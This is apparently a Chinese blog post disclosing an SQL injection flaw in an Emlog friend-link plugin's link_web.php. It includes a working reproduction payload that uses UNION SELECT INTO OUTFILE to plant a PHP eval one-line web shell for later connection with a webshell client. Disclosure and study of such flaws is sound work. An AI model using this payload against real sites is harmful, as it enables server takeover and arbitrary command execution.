Emlog簡介

Emlog是“Every Memory Log”的簡介，意即：點滴記憶。它是一款基於PHP語言哈MYSQL資料庫的開源、免費、功能強大的個人或多人聯合撰寫的部落格系統（Blog）。基於PHP和MYSQL的功能強大的部落格以及CMS建站系統。致力於提供快速、穩定，且在使用上又及其簡單、舒適的部落格服務。安裝和使用都非常方便。目前Emlog正在受到越來越多的廣大使用者的青睞。

漏洞簡介

漏洞簡要概括：
Emlog友情連結自助外掛開的的主要目的是為了減輕友情連結的稽核工作，通過申請者自己填寫表單的方式提交申請，之後通過在後臺檢查申請者的網站是否存在，如果存在則將該連結資料加入資料庫，否則不新增。

存在漏洞的外掛下載地址：https://pan.baidu.com/s/1fRRZ4HIhdUH9S36pU2BA6w

在該外掛當中的link_web.php檔案中，直接將使用者提交的資料進行了拼接，之後直接帶入了查詢，未經過任何的過濾操作，由此一個典型的SQL隱碼攻擊漏洞就這樣簡易的誕生了：

漏洞復現

由於這裡的引數都沒有經過過濾，所以我們可以對任意引數進行驗證，進行SQL隱碼攻擊，首先我們可以提交正常的訪問請求，之後使用burpsuite進行抓包，之後改包，我們這裡以URL為例：

在抓取到資料包之後，我們可以將url改為以下內容：

url=http://www.dyboy.cn' union select 1,2,3,4,5,'<?php eval($_GET[cmd]); ?>' into outfile 'c:\\phpstudy\\www\\shell.php' 

之後，這條語句會正常執行，同時也會在C:\phpstudy\www\下生成一個shell.php，而且該shell.php中的內容正是我們之前寫入的一句話，之後我們可以使用菜刀進行連線。

由於過於簡單，這裡就不再多做演示了，有興趣的人可以根據本博主上面給出的連線，下載該外掛到本地之後進行測試。